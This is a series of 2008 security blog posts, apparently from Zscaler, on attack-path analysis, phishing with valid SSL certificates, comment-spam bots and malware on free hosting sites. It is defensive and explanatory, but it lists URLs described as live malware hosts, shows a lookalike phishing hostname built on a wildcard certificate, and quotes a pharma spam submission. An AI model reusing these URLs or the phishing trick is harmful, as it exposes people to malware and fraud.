Friday, December 26, 2008

You Gotta Stop Them Somewhere

Let's say you've established some security objectives, including "Keep an attacker who controls Internet web sites my employees visit from denying my employees access to my corporate information." How can you tell whether the product you're considering will help you meet your goal?

In theory, it's pretty simple: for a set of controls to give you the security benefit you are looking for, there needs to be at least one control blocking every possible path from what the attacker can do before he attacks (control Internet web sites your employees visit) to the thing you really don't want him to do (stop your employees from accessing your corporate information). If there is a path on which nothing stops the attacker, you have a security vulnerability, which means you need to change either your goals (maybe they're too aggressive for current technology to support), the system architecture, or the set of controls you're using. If there are paths on which multiple controls stop the attacker, you have defense in depth; how much depth is good depends on your level of paranoia and the performance, administrative and financial costs you are willing to put up with.

In practice, when you're trying to use security controls to meet a minimum bar, the hard part is knowing what paths are available for an attacker to take. Each path is made up of individual steps, each of which has starting and ending privileges. There are 3 kinds of steps to consider:

  • By Design: the system is designed to give someone holding privileges S the privileges E.
  • Design Side-Effects: it didn't necessarily need to be this way, but the system is designed such that someone with privileges S can automatically get privileges E.
  • Implementation Flaws: someone with privileges S can get privileges E even though the design of the system does not allow this step.

I find it quickest and most enlightening to start at both ends (the attacker's starting privileges and your anti-goals for the attacker), and enumerate the endpoints of steps in each category.

Let's start at your anti-destination for the attacker, denying employees access to corporate information. You may think that because this is a denial of service threat, you didn't design your system to enable it at all, but chances are good you can get a pretty good list from your departing employee process.


My system is designed to deny [ex-]employees access to corporate information when:
The user's account is deleted from LDAP.
The user's account is deleted from the 'employee' group.
The user's password is changed.
Ownership of a file formerly owned by the user is changed.
Files owned by the user are deleted.
...


Because these things have to work for your sysadmin when an employee leaves, they would also work for an attacker, if an attacker could do them.

To get a list of design side-effects an attacker could use to prevent an employee from accessing corporate information, try inverting the table of contents of your disaster recovery plan (or, if you don't have one, the categories in your IT help desk ticketing system). You know if any of these conditions are true, your IT crew is going to scramble because employees won't be able to get the information they need. This is true whether it happened by accident or an attacker did it to you on purpose.

This leaves us with implementation flaws. You can't really list these unless you are running known-vulnerable software. Presumably if you knew you were running vulnerable software, you would patch it, so let's not try to create this list directly. Instead, list the components which have the permissions to do things in the first 2 lists. If these components were vulnerable (in the right ways), an attacker who got far enough to reach the vulnerable interface could exploit them and presumably accomplish the original threat.


An attacker may be able to prevent access to corporate information when:
A vulnerability in the LDAP server allows an attacker to delete user accounts, change group membership, ...
A vulnerability in the file server allows an attacker to delete files, change file permissions, overwrite files, ...
A vulnerability in the user's desktop allows an attacker to prevent the machine from booting, delete applications, delete files, change file permissions, overwrite files, change the user's password, ...
...


Now, start from the other side. If an attacker can control an Internet site your employees visit, what can he do by design?


A web site my employee visits can:
Set or delete cookies for that site on my employee's desktop.
Redirect the employee's browser to another Web site.
Run javascript in the user's web browser in the context of that site.
Run java applications, signed ActiveX controls, …
...


What can he do as a design side-effect?


A web site my employee visits can also:
Respond to a single request with more than one response.
Persuade my employee to run damaging commands or executables.



What could he do as a result of implementation flaws?


A web site my employee visits can:
Take advantage of any security flaw in the employee's web browser or plugins.


In the middle, for any given potential connection you can have one of three things: a working path for the attacker, a control that blocks the attacker's path to your anti-goal for the attacker, or something more fuzzy (usually including the word "may"). If there are any working paths for the attacker that traverse only steps that are by design, you have a requirements conflict and it will not be possible for technological controls to meet the security objective you have in mind unless you change your requirements. For any other working path, you need to find a control that will break a link. Or, going the other way, to be complete, the set of controls you are considering must break at least one link in each otherwise-working path. Probably to get this effect, you will need to combine controls from multiple sources. If a set of controls doesn't break any links in any attack paths you care about, don't buy it.

From the above partial lists, there is a pretty clear connection between an attacker being able to take advantage of security flaws in the employee's web browser and the consequences of a vulnerability in the user's desktop: the web browser runs on the user's desktop, so a security flaw in the browser would mean the attacker with control of a web site visited by the employee can deny the employee access to corporate information, violating this security objective. There is an equally clear connection between social engineering the employee into opening malware and violating this security objective. The latter connection, because it doesn't involve any implementation flaws, is more serious, and it would be prudent to mitigate it. You could, say, compare the effectiveness of user-education programs, desktop anti-virus, and an HTTP malware scanner (my money, hopefully obviously, is on combining the desktop AV and the HTTP scanner, because people will click on anything).
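To make that concrete, here is a toy sketch in Javascript, with invented step and control names: steps are edges between privilege states, each control breaks an edge, and the attacker wins if any path of unbroken edges connects his starting privileges to your anti-goal.

// A toy model: each step is an edge from one privilege state to another,
// and a control "breaks" an edge. All names here are invented examples.
var steps = [
  { from: 'controls-website', to: 'script-runs-in-browser' },     // by design
  { from: 'script-runs-in-browser', to: 'code-exec-on-desktop' }, // implementation flaw
  { from: 'controls-website', to: 'user-runs-malware' },          // design side-effect (social engineering)
  { from: 'user-runs-malware', to: 'code-exec-on-desktop' },
  { from: 'code-exec-on-desktop', to: 'employee-denied-access' }  // the anti-goal
];

// Controls, expressed as the edges they block (e.g. a patched browser).
var blocked = new Set(['script-runs-in-browser->code-exec-on-desktop']);

// Breadth-first search: is there a path of unbroken edges?
function attackerWins(start, antiGoal) {
  var seen = new Set();
  var queue = [start];
  while (queue.length > 0) {
    var here = queue.shift();
    if (here === antiGoal) return true;
    if (seen.has(here)) continue;
    seen.add(here);
    steps.forEach(function (s) {
      if (s.from === here && !blocked.has(s.from + '->' + s.to)) {
        queue.push(s.to);
      }
    });
  }
  return false;
}

// true: the social-engineering path is still unbroken
console.log(attackerWins('controls-website', 'employee-denied-access'));

In this toy model the browser patch breaks the implementation-flaw path, but the social-engineering path is untouched, so the completeness requirement says at least one more control (AV, HTTP scanning, user education) is needed there.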

Because the fuzzy paths say "may", you get some leeway in deciding whether you think there is a working path for the attacker to follow from his starting privileges to the things you don't want him to do. If you have no known working attack paths, you might consider reducing risk in these areas (e.g. by instituting an aggressive monitoring & patching policy, or buying a product which attempts to defend against relevant 0-day attacks) before adding depth to your defenses in other areas.

--Brenda

Monday, December 22, 2008

Money magazine's take on phishing

The January 2009 issue of Money magazine published a quiz entitled "Are you Phish Food?" The purpose of the quiz was to gauge your ability to recognize when you are being targeted by a phishing attack. If you don't get the print magazine, you can take the quiz online too.

Overall the quiz is basic, but that’s acceptable given the target audience (general consumers). It's nice to see articles like this, as consumer education about security threats still has a long way to go (but we're making good progress: most consumers now know, even if they do not understand why, that they need some kind of anti-virus protection on their systems). There was, however, one question that made me cringe a little.

The question was whether using HTTPS was a good or bad thing, and Money's response was that it was a good thing assuming the SSL certificate is valid (which they explain as the little lock icon in the browser not reporting any problems). In other words, if the URL is using HTTPS, and the certificate is good, then don't worry--you're safe. This is actually a bit misleading.

In this day and age, basic SSL certs are tied to hostnames (or, in the case of wildcard SSL certs, root domain names). The process of vetting SSL cert recipients has diminished over the years; nowadays you can be immediately issued a domain-only SSL cert if you control the web server for that domain. In fact, this diminished accountability for normal SSL certs is one of the reasons for the introduction of the newer crop of EV (Extended Validation) SSL certs (a.k.a. the 'green bar' SSL certificates). EV SSL certs (re-)establish a level of recipient review and validation.

Anyways, let's bring this back to phishing. Money magazine says that a valid HTTPS cert means things are OK. But what's to stop a phisher using 'www.evil.com' from getting a valid SSL cert for that hostname? Absolutely nothing, other than the financial cost acting as a barrier to entry. But domain-only SSL certs are now as cheap as US$15, and I have to imagine such a cost is negligible if the phishing site has even a minimum level of success. Sure, phishers treat their sites as disposable, and buying a new SSL certificate for every site could become expensive; but if valid HTTPS connections contribute to the success of the phishing attack, then there might be justifiable ROI. At that point, the SSL cert is just a cost of doing business for the phisher (or, as I like to refer to it, a 'cost of doing evil').

But let's take this one step further. Getting an SSL certificate for www.evil.com has minimal value, because www.evil.com clearly doesn't resemble a plausible phishing target such as www.paypal.com. And perhaps every certificate authority (CA, the people who sell SSL certs) in the world checks and denies SSL certificate requests that include derivations of the word 'paypal'...although that is highly doubtful. But even if they did, wildcard SSL certificates can bypass this check to a certain degree. An attacker would just purchase a '*.evil.com' wildcard certificate from the CA, and then set up a site such as 'paypal.evil.com'. The CA would never know the final hostname in use. Does the hostname still look suspicious? What if the attacker gets the domain name 'cgi-bin-webscr.com', and requests a wildcard certificate for '*.com.cgi-bin-webscr.com'? The SSL-validated URL "https://paypal.com.cgi-bin-webscr.com/?cmd=login" could look convincing to some folks...
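To see where the browser's trust actually lands, consider this simplified sketch (it naively assumes a two-label registrable domain, which breaks for ccTLDs like .co.uk; real code should consult the Public Suffix List):

// The certificate is valid for the registrable domain, not for the
// familiar-looking prefix a victim actually reads. Naive "does it
// contain paypal.com?" checks get this wrong.
function registrableDomain(hostname) {
  return hostname.split('.').slice(-2).join('.');
}

console.log(registrableDomain('paypal.com.cgi-bin-webscr.com')); // "cgi-bin-webscr.com"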

And just for fun, I took a look at all of the reported phishing sites on Phishtank.com for the past month. There was only one site using HTTPS; it was posing as an eBay site, and it did, in fact, have a valid SSL certificate issued for the phishing domain name. So this discussion isn't speculation...it's actually occurring.

Overall, the mere presence of a valid SSL certificate does not imply a safe site. You could, in fact, be (securely) talking to an attacker. EV SSL efforts help with this situation, but they are cost-prohibitive for many sites, and it will take a long time before the majority of the world uses them (if ever). So end users must still remain vigilant about verifying which sites they are visiting...and the presence or absence of a standard valid HTTPS/SSL certificate is a negligible factor in that process.

Until next time,
- Jeff

Final encounters with a web comment spammer

In the last part of my series on web comment spamming applications, I want to pass along a few things I noticed that were effective at separating the spam apps from the humans. Many of these have been publicly discussed already, but they still are worth repeating. Also, note that none of these techniques provide a permanent, fool-proof way to stop spam apps. These suggestions will curb the tide of comment spam that is being spewed by today’s spam apps--but tomorrow's spam apps, if adapted, would be able to circumvent these mechanisms. Anyways, onto the mechanisms.

Use Javascript
None of the spam apps I've encountered to date run Javascript. So you can use a Javascript mechanism to manipulate the form before it is submitted: dynamically change the form action URL upon loading or submission, update the value of a hidden field to indicate Javascript is present and functioning, etc. Any submission to the wrong form action URL or without the proper hidden field value should be discarded.
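As a minimal sketch of the hidden-field variant (the form id, field name, and token value are all arbitrary choices of mine):

// Runs in the visitor's browser: only a Javascript-capable client will
// ever set this value, so the server can discard any submission where
// the hidden field is missing or wrong.
window.onload = function () {
  var form = document.getElementById('comment-form'); // your form's id
  form.onsubmit = function () {
    document.getElementById('js_check').value = 'js-enabled-7f3a';
    return true;
  };
};

The server-side half is a one-line comparison against the expected token; rotating the token per session keeps replaying bots from hard-coding it.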

The downside of this approach is that it requires the user to have Javascript enabled in their browser. While Javascript is mostly ubiquitous in the Web 2.0 world we live in, browser plugins like NoScript are still highly popular. So you have to make the executive decision on whether you want to require your users to enable Javascript to use your form...which might not be a problem if you already require it for other things (i.e. Web 2.0 elements in use on your site).

Monitor the time it takes to fill out the form
My simple experiment kept track of the time between when a spam app requested the form and when it submitted the form. What I saw was that the submission came back immediately. There is no way a human could reasonably fill out the fields of the form in under, say, two seconds. This provides a simple way to discard spam: keep track of when the form was requested (via a time value stored in server-side session storage or within a hidden form field) and compare it against the time the submission arrives.
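Sketched as a plain function, assuming you stashed the render time in server-side session state when you served the form:

var MIN_MILLIS = 2000; // no human completes the whole form this fast

function isTooFast(renderedAtMs, submittedAtMs) {
  return (submittedAtMs - renderedAtMs) < MIN_MILLIS;
}

// When handling the submission:
//   if (isTooFast(session.formRenderedAt, Date.now())) { /* discard */ }
// If you store the timestamp in a hidden field instead of the session,
// sign it, or the bot can simply replay an older value.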

Now sure, spam apps can get around this by slowing down a bit during the form submission process. But since these apps are trying to spew out tens/hundreds of thousands of spammy form submissions, requiring each submission to slow down causes significant time overhead for the user of the spam app. Are they willing to be patient and wait 10 times longer for their spams to be submitted?

Use CSS to hide some form fields
The spam apps liked to populate every text input field in the form with some kind of value. You can wrap a field in an HTML DIV with a CSS style set to 'display:none', which essentially makes the field invisible. Normal CSS-capable web browsers will not display the field, so the user will never get a chance to enter input data into it. But the spam applications do not account for the hidden DIV, and thus will treat it like any other field on the form (and input a value). Thus all you need to do is see if that invisible form field contains a value upon submission, and if so, discard the submission. For safety, put a warning (also in the DIV) telling users not to fill out the field if they see it; that way, if for some reason a user has a browser which is not CSS-capable, they are still prompted to leave the field blank.
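The server-side half of the check is then a one-liner; in this sketch the honeypot field is named 'website_hp' (an invented name):

// A legitimate user never sees the field, so it arrives empty;
// spam apps fill every text input they find.
function honeypotTripped(fields) {
  return typeof fields.website_hp === 'string' &&
         fields.website_hp.trim() !== '';
}

The same test works for any trap field a real user can never legitimately fill, including the commented-out textarea described next.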

Textarea input field in HTML comments
I noticed one of the spam apps that hit my form just couldn't resist the temptation of populating data into a textarea input field that was within HTML comments. Normal browsers will ignore everything in comments, including the erroneous textarea field; so any submissions that include that field should be discarded as spam.

Don't use obvious form field names
Avoid using the field name 'email' for a user's email address, etc. In fact, you can turn this to your advantage: have the email field be named 'foo' or something else innocuous, and then check upon submission that the 'foo' field data format matches the format of an email address (which is typically done for validation purposes anyways). Since the spam apps often shove random garbage into fields they do not understand, you can discard any submission that does not contain what looks like an email address in the 'foo' field. Alternatives include checking numeric format in postal code or phone number fields, etc.
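For example (a sketch; the deliberately rough regex checks general shape, not full RFC compliance):

var EMAIL_SHAPE = /^[^@\s]+@[^@\s]+\.[^@\s]+$/;

// 'foo' is the innocuously named field that the visible label presents
// as the email address; garbage there marks the submission as spam.
function failsEmailCheck(fields) {
  return !EMAIL_SHAPE.test(fields.foo || '');
}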

Overall, these few simple tricks can help you alleviate the flood of web comment spam that your site might be experiencing. They may not be perfect, but they are simpler to implement than a CAPTCHA and do provide real protection against the current crop of web comment spam apps that are roaming the Internet. Every little bit helps.

Until next time,

- Jeff

Saturday, December 20, 2008

Ask Why Until They Slap You

As I mentioned last week, real benefit is subjective. I would derive no benefit whatsoever from tickets to a football game. Curling, on the other hand, is intriguing; attending a curling match would benefit me a great deal. In this case, based on the relative sizes of the curling and football industries in the United States, I am almost certainly in the minority. What meets one person's needs perfectly may not do a thing for someone else.

Furthermore, attending a curling match would benefit me because I like observing human, real-time approaches to infinitely variable analog control problems, whereas someone else might benefit by the opportunity to cheer for her son, who is playing on one of the teams. Which is to say, a single solution can have very different benefits for different people.

So how does one tell if, say, a security SaaS provides real benefit? If you're considering a security product, the steps go:
  1. Decide what you actually need.
  2. Determine whether the technological controls provided by the solution you are considering will get you that.

Those are both pretty big topics, so this week, let's delve into deciding what you actually need. Erik Simmons, Intel's requirements guru, has a surprisingly effective suggestion for eliciting the real requirements: Ask why until they slap you.

Requirements Guy: Why do you want to buy a product that filters bad HTTP stuff out?
Customer: Because I don't want my employees running malicious Javascript, installing Trojan horses, catching viruses, ...

Vendors in conversation with potential customers would probably stop here if they do everything mentioned (which of course we do), since being slapped by your customer is not what most people set out to do in the morning. But you, evaluating us, should not stop.

Requirements Guy: Why not?
Customer (giving Requirements Guy a funny look): Because that would be BAD! Everyone knows that!
Requirements Guy: Why would it be bad?
Customer (enunciating very clearly & speaking louder and louder): My employees would be unable to get any work done. My IT department would need more people to clean up the mess. My super-secret company data would go flying off to the four winds and all the regulatory agencies that apply in my line of work would shout at me. My name would be on the front page of the Wall Street Journal!

Requirements Guy is getting warm. He has unearthed several underlying concerns that are candidates for what Customer actually needs. But right now, only one of these concerns (people outside the company getting a copy of confidential corporate data) refers to an asset that can be directly manipulated by a computer. He needs to keep going to nail down the other concerns in a way that is useful for considering security benefit. Let's do one more.

Requirements Guy: Why wouldn't your employees be able to do their work?
Customer: Their computers wouldn't work!
Requirements Guy: Why would that stop the employees from getting their work done?
Customer: Their computers are the only way to get at all the corporate information they have to look at and create.

This time, Requirements Guy should really stop: one more why, and he's done for. He has an underlying asset (corporate information) and concern (availability), so let's say that the second concern this customer cares about is availability of information. You would need to follow up those other leads until you feel you've covered the important things you need.

Security can't ever give you the whole benefit you're looking for, only stop attackers from taking the benefit away. Therefore, to finish defining the security benefit you're looking for, you need one more thing: an attacker. For this purpose, the important part about an attacker is: before they start attacking, where are they in relation to your system and what can they already do? In this case, let's say you are expecting an attacker on the Internet (a good idea), and you assume he can control content on Web sites your employees visit. You would need to keep following leads to come up with a complete list of attackers you care about. For now, the benefit you are looking for becomes "Keep an attacker who controls Internet web sites my employees visit from denying my employees access to my corporate information." This is not going to be the only security benefit you want, but I'll use it as an example next week when I talk about figuring out whether controls a vendor offers make the benefit you want possible.

Now let's suppose I'm Zscaler. As a security SaaS, how do I ensure that I'm providing real benefit? The steps go:
  1. Derive the underlying concerns of a substantial set of my customers or prospective customers.
  2. Ensure the technological controls I provide can be configured to meet those underlying concerns in the space I've set out to protect.
This doesn't mean the controls can't do anything else, but it sets a minimum bar for the benefit provided by the controls. This, I'm happy to say, is exactly what Zscaler is doing; the hypothetical customer scenario above is one example.

--Brenda

Thursday, December 18, 2008

Turning a Blind Eye

All too often, evil is lurking right under our noses, yet we choose to turn a blind eye. Sometimes we do this out of fear. After all, if we get involved, we too could get hurt. Other times however, we are just as much to blame as the guilty parties perpetrating the crime. We choose not to get involved because we too profit from the crime, although we do so passively and leverage that as our defense.

A couple of years ago, I drew attention to the fact that free website providers were profiting from allowing phishers to set up shop and doing nothing to stop them. They profit because they make money from ad-supported pages: the more traffic they generate, the more money they make, and how that traffic is generated doesn't seem to be of concern. I ruffled a few feathers by speaking my mind and generated a much-needed debate on the issue. The argument from the hosting providers was that they try very hard but some pages slip through the cracks. Although I don't buy the excuse, to be fair, automating the detection of phishing pages isn't without challenges. What about malware then? Do these same sites foot the bill for hosting/delivering malicious binaries? Sadly, the answer is yes.

Being an ‘in-the cloud’ security solution, our Zscaler infrastructure permits powerful data-mining capabilities from a research perspective. The very nature of a cloud architecture means that logs can be centralized, providing a powerful view into global attacks. Leveraging this capability, I sought to identify malware being hosted on free web sites. It didn’t turn out to be much of a challenge as evidence was everywhere. A sample of what was discovered can be seen below:

Caution: At the time of this blog post, these URLs were live and hosting malware – proceed at your own risk.

Geocities (Owned by Yahoo!)

http://www.geocities.com/sltap/main.html
http://uk.geocities.com/dravidaperavai/
http://www.geocities.com/SiliconValley/Hills/7140/
http://www.geocities.com/dental_associates/
http://www.geocities.com/jennifer_garner_zone/trivia.htm
http://www.geocities.com/aga_muhlach_2000/r.html
Tripod (Owned by Lycos)

http://india_resource.tripod.com/indianhistory.html
http://members.tripod.com/~INDIA_RESOURCE/Shia-Plight.html
Angelfire (Owned by Lycos)

http://www.angelfire.com/tx5/jr2k/Stor/2.html
How difficult would it be for these providers to identify the malware they are hosting? It would be trivial. The files are hosted on machines they control and we're not talking about 0day attacks here. In every case, more than 20 commonly available AV scanners detected the malicious content, and in some cases the malware was years old! This isn't just incompetence, it's gross negligence.

So why then wouldn’t they make an effort to eradicate viruses from their servers? The answer is simple. The cost to do so outweighs the benefits derived. In other words, removing content from their sites reduces the number of eyeballs they receive and in turn decreases ad revenue. They are turning a blind eye to the fact that their users are getting infected with malware.

Gross negligence can be defined as “failure to use even the slightest amount of care in a way that shows recklessness or willful disregard for the safety of others”...sounds like an open and shut case to me.

- michael

Saturday, December 13, 2008

Avoiding Snake Oil: SaaS Challenges

It can be awkward to talk to other security geeks between when you accept a job at a startup and when you have worked there long enough to figure out what is actually going on:

Other Geek: What do they do?
Me: Client security using a SaaS model.
Other Geek: How does that work?
Me: They filter the traffic between the client and whatever it's talking to on the Net. It's cool because the customer configures stuff once for all their sites (clicky, clicky) instead of having to install & configure a bunch of boxes at each site. Plus it can protect people working from coffee shops.
Repeat Indefinitely:
Other Geek: Completely reasonable questions about successively more detailed engineering and business concerns, all of which boil down to "How could that possibly work?"
Me: Increasingly vague hand waving, as the questions proceed further and further away from my limited knowledge of what my soon-to-be employer actually does.

The only plus side of conversations during this period is, you know you aren't revealing anything secret, because you don't know anything yet.

As I finish my first week of work at Zscaler, I have a lot more idea of what is going on, and I have acquired my first self-assigned mission: making sure that what we are selling is not, and never becomes, snake oil, whether or not all other available solutions are unctuous or reptilian. Because of our line of work I'd say we have some risk in this area (as many of my friends and acquaintances were keen to point out), and I'm not too worried about ensuring we are the best available solution, since plenty of my coworkers are focused on that.

I see 3 keys to avoiding snake oil, from a vendor's perspective:

Accurate customer expectations
The customer must understand what to expect, and their understanding must match what is actually going to happen. Since the vendor knows what is actually going to happen, the vendor has to make sure the customer has the right impression. This is tricky for any security product. As security people know but other people would usually rather not hear, 100% protection is not possible. To make things worse, 90% protection doesn't mean anything, since even within the security industry there is no simple, well-understood metric for describing how much protection a particular product provides. Security people would normally describe specific kinds of protection provided and the strategy for implementing each, but non-security people don't have the background to understand what this implies for them. And because each situation is different, the security people need more information about each customer to be able to explain the implications.

Real benefit
The product must actually do something to protect the customer in ways that matter. Since real benefit can be in the eye of the beholder, security vendors need to consider benefit from the viewpoint of a hypothetical security-knowledgeable customer; a representative such person may or may not exist. Some things are clear: it is valuable to protect against attacks that are actually occurring and would have worked if the product hadn't stopped them. It is less clear whether protecting against attacks that are still theoretical is worthwhile. It is also apparent that the scope of protection must cover gaps in other protections the customer is planning to use. This is a challenge for security as a service today, because a SaaS model implies a new way to partition the problem, so existing products may not mesh well. On the deeply unclear side: for non-security people, it isn't about viruses, botnets or cross-site scripting, it's about somebody erasing important data, clogging the network, stealing intellectual property, and so on. But protection tends to be organized by security geeks, i.e. by class of attack it defends against. Whether protecting against viruses, but not botnets, is enough to be valuable depends on customer expectations and scope considerations. Finally, the lack of metrics applies here, too: currently it is very difficult to quantify how much protection is enough.

Verifiable benefit
The customer must be able to verify that they are actually being protected in the way they expect to be protected. This can be tricky for the same reasons setting accurate customer expectations is tricky, but for an in-the-cloud security service, it is even harder. After all, in the ideal world, a customer is protected but not inconvenienced, i.e. the customer never notices the service. In most cases, all a customer has to go on is the vendor's word that protection has taken place. Certainly security in the cloud is blacker than black box: a would-be tester doesn't even have a box to play with directly, and the box is intended to change regularly without warning or customer intervention. Few companies are paranoid and wealthy enough to employ skilled security folks to set up an ongoing independent monitoring system. In this situation, it will be tricky but even more important for vendors to supply an answer beyond the infamous "trust us, we know what we're doing".

Until now, I've always been on the other side of the fence, poking at products and determining whether they live up to my exacting standards. The view is a little different from over here, but I feel confident. Keep watching and we'll all find out how Zscaler meets these challenges.

-- Brenda

Friday, December 12, 2008

Overweight Thin Clients

I remember the dawn of the new millennium well. The Internet boom was in full swing and we were predicting the death of the PC. Fat-client machines would no longer be needed in an Internet-driven world, as people would require only an Internet-capable device to access everything they had ever dreamed of. Companies like Netpliance quickly jumped on the bandwagon, offering cheap Internet appliances such as the i-Opener. The game plan was to take a loss on hardware and recoup the cost by selling Internet services. Many agreed that this was the future, but after only a couple of years in business and a measly $230,000 in sales, the writing was on the wall - we weren't ready to give up our beloved PC. Netpliance became TippingPoint and the days of the 'Internet toaster' were...well...toast.

Cloud computing has once again promised a world in which thin clients will reign supreme - all data and processing will occur in the cloud so you'll only need a basic device with minimal processing power. This time around, everyone is jumping on the netbook bandwagon - cheap, mini-laptops with minimal processing power. Is it a fad this time as well, or are we finally ready to turn in our PCs?

Interestingly, browsers are moving in the opposite direction. They've been suffering from feature bloat for a while now (email clients, RSS readers, etc.), but now we're actually changing the architecture of web applications to push data and processing to the client. Adobe Flash has been around forever but the Rich Internet Application room is now getting pretty crowded with the likes of Google Gears, Microsoft Silverlight, JavaFX, etc. Google has also recently released Native Client, an effort to run x86 native code in web applications. All of these projects are blurring the line between desktop and web applications.

Is this a good thing? Time will tell. Does it present new security challenges? Certainly. Applications are becoming increasingly complex and distributed. This always raises the bar and makes security a greater challenge. We're no longer dealing with simple static HTML. Now we may have interpreted scripts alongside compiled binaries, all of which are sitting on different machines and may well include untrusted code written by a third party. Webapp security has gone from being a profession for those who didn't have the time/skill/interest in learning reverse engineering skills to the cutting edge of security, and suddenly those RE skills are starting to look pretty valuable once again. Another security issue involves pushing data to the client for storage and processing. It's relatively easy to secure data on a server (we finally seem to be getting a handle on the SQLi thing...after a decade of preaching), but it's a different story when data sits on every client. Developers must take great care in deciding what is pushed to clients, as the gloves come off any time you no longer have control of the device where sensitive data resides. Will developers understand the security challenges of this new architecture? History suggests that it will simply open another chapter in the many challenges which we face in enterprise security.

So what will it be - streamlined thin clients or powerful workhorses? What does the future have in store for us? As a guy that just can't help but buy the most powerful device available, I expect that client side storage/processing has just started to evolve - netbooks on the other hand may well go the way of the Internet toaster.

- michael

Wednesday, December 10, 2008

Third encounters with a web comment spammer

In my previous two posts, I wrote about a web comment spam application that has been hitting one of my personal web sites. I set up a bit of an agility test for the bots to figure out what they were, and were not, capable of doing. Eventually I was able to put together a fairly good operational profile of the spam application's functionality. In this post, I want to review the operation of another spam application that I happened to encounter during my test...one that seems far more capable than the original one I aimed to report on.

To briefly recap my previous two articles, there was one particular application that repeatedly kept visiting my site. It would send a bunch of bogus links in various formats as a comment in a web form; since the links were entirely random, I hypothesized that these submissions were mere probes serving some future purpose rather than being the end goal themselves. Anyways, the operational profile that I constructed for the application looks like:


  • It recognized a few form field names and attempted to submit appropriately formatted data to them, but all other fields were filled with random garbage (unless an existing form field already held a value); specifically:

    • It put an email address in the 'email' field, but not the 'eml' field

    • It put a URL in the 'url' field, but not the 'link' field

    • It did nothing special with the name, address, and phone fields

  • It supported cookies during the submission process

  • It did not support Javascript

  • Hidden form fields were properly submitted/included

  • It could support multi-step submissions

  • The User-Agent seems configurable, but is mostly left as the same value

  • Many uses of this application against my site have originated from the same Class C public Internet network

During my experiment, another spam application wandered onto my site and partook in my little agility test. This particular application stood out as exceptionally different from the previously profiled application. Here's an example of what the application actually sent (which can be compared against the raw data contained in my previous post). I've modified the domain names; I assure you the originals used live/real URLs.

eml: korch_poposk@xxx.yy

email: korch_poposk@xxx.yy

name: DoorieHoohona

phone: 123456

address: http://xxx.yyy.com/Avalide/map.html

url: http://xxx.yyy.com/Bust-Enhancer/map.html

link: http://xxx.yyy.com/L-Glutamine/map.html

comment: Wellbutrin XL what is celebrex clonidine medicine bupropion and weight loss <a href=http://xxx.yyy.com/Female-Libido-Patch/new-scientist.html>new scientist</a> <a href=http://xxx.yyy.com/Evegen/evegen-reviews.html>evegen reviews</a>... [truncated for brevity]

Just looking at the values submitted in these fields, there is a night-and-day difference when compared to the previously mentioned spam application I was tracking. This new application was significantly more successful at putting contextually-correct information in the right fields: email addresses were submitted for both 'email' and 'eml' fields; something that resembled an actual human name was submitted in the 'name' field; the 'phone' field was numeric; both 'link' and 'url' fields held URLs. The value of the 'address' field is debatable...perhaps the application is coded to believe 'address' is akin to a web site address, i.e. URL. Or, maybe this particular app shoves URLs into fields it does not recognize (and thus the URL values in the 'address', 'url', and 'link' fields were actually just dumb luck). The links submitted within the comment only used one format (a proper HTML <A> tag), so it's not as robust as the other application in abusing web applications that allow the use of popular forum code markup (i.e. the [url] and [link] pseudo-tags). But overall, the level of contextual awareness of this application is far more interesting than that of the previously profiled spam application.

So the current operational profile of this spam application is:
  • It has shown to be very successful at putting the right contextual/formatted information into a variety of different form fields; specifically:

    • It put email addresses into the 'email' and 'eml' fields

    • It put a human name into the 'name' field

    • It put a numeric value into the 'phone' field

    • It put URLs into the 'address', 'url', and 'link' fields

  • It supported cookies during the submission process

  • It did not support Javascript

  • Hidden form fields were properly submitted/included

  • The application does not appear to support multi-step submissions; or at least, it didn't care about verifying that the submission worked

  • The User-Agent string submitted is extremely easy to spot: "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)"

Unfortunately this particular application only visited my site once, so I don't have multiple submissions at hand to aggregate into a more comprehensive profile. I'll sure be on the lookout for the next time it comes back around.

Until then,
- Jeff

Tuesday, December 9, 2008

The Malware Tea Leaves

When parents want to know what's cool, they turn to the experts - their kids. Parents are shielded from coolness by structure and routine. They've worked hard to establish a delicate balance between work, family and finances and the last thing they want is change. Kids on the other hand are unencumbered by structure and quickly adapt. What was trendy yesterday is passé tomorrow.

By the same token, if we want to identify trends in technology, we should not look to large corporations, saddled with policy and bureaucracy. Even start-ups, while nimble, have to play by the rules. Malware authors on the other hand are completely unencumbered by rules, legal or otherwise. They provide a unique window into technology trends. When the koobface virus was adapted last week to target Facebook users, it garnered significant press for attacking a popular social networking site. I on the other hand was intrigued not by the targeted site so much as by the koobface author's choice of communication medium. Koobface, like most malware today, relies on social engineering to spread. In this case it attempts to convince the victim that their system lacks a particular codec which is required in order to view a video. Once the user downloads and installs the malicious binary, they're infected. Such attacks have historically relied on email to spread and entice new victims. Koobface reveals the shift that we are experiencing in the way that users prefer to communicate. A co-worker recently mentioned to me that he was forced to create a Facebook profile, not because he wanted to, but because it was the only way that he could stay in touch with his niece and nephew - they didn't use email - they didn't need to, as they lived in a social networking world. The author of koobface has realized this as well. Email is tired and Facebook is wired.

So what do the malware tea leaves reveal?

Email is Old School - Why send a static message when you can participate in a vibrant conversation, social networking style. Don't expect email to disappear but do expect webmail to be increasingly preferred over traditional email clients. Alternate communication mediums such as social networks, Twitter, etc. also present avenues for compromise and data leakage.

HTTP Consolidation - Malware increasingly uses port 80 as a communication channel, regardless of whether or not the traffic is HTTP. Why? Outbound ports 80 and 443 are always open on corporate firewalls. Intelligent networking applications such as Skype will also try a number of tricks before ultimately reverting to communication on port 80 for this same reason. If you're solely relying on traditional firewalls for protection, you're exposed. Perimeter security applications need to be 'application aware' - ports are meaningless.

End User Empowerment - The Internet was supposed to do away with the desktop and leave us all with thin clients. However, the power of cloud computing has had an unanticipated side effect - it has empowered end users. You no longer need the IT department to deploy a new solution. Instead, you can setup an online account and be up and running in minutes, all without assistance from the techies, or perhaps even without approval. Attackers are all too aware of this and have over the past couple of years significantly shifted their attacks from the server to the client. The defenses are lower and valuable information is either stored there or it's an easy way to grab some authentication credentials and get the goods that live in the cloud.

Who says an old dog can't learn new tricks? Pay attention to patterns in malicious software, there's always something driving a new trend and we can learn a great deal from it. Want to identify the next big thing? Ask an attacker and while you're at it check with your kids before updating your wardrobe.

- michael

Monday, December 1, 2008

Second encounters with a web comment spammer

Earlier I wrote my First Encounters with a Web Comment Spammer piece. In that piece I devised a plan to lay a trap of sorts for the web comment spamming application, in order to test the depth of the application's functionality. Well, it's been a few weeks, and now I have some data to share.

